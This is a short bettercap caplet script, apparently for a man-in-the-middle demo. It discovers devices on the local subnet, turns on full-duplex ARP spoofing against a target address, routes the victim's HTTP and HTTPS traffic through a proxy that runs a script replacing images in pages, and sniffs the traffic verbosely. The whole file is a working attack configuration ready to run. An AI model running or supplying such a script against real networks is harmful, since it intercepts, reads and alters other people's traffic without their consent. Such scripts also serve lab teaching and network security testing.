# usage:
# sudo ./bettercap -caplet replace-images.cap -eval "set arp.spoof.targets 192.168.3.10"

# detect all devices in subnet:
net.recon on
net.probe on
sleep 5
net.probe off
net.recon off

#replace all imgages in html-source:
set http.proxy.script replace-images.js

# redirect http & https traffic to a proxy:
http.proxy on
https.proxy on
sleep 1

set net.sniff.verbose true
net.sniff on

#configure arp.spoofing:
#set arp.spoof.internal true
set arp.spoof.fullduplex true
#set arp.spoof.targets 172.16.3.10
arp.spoof on
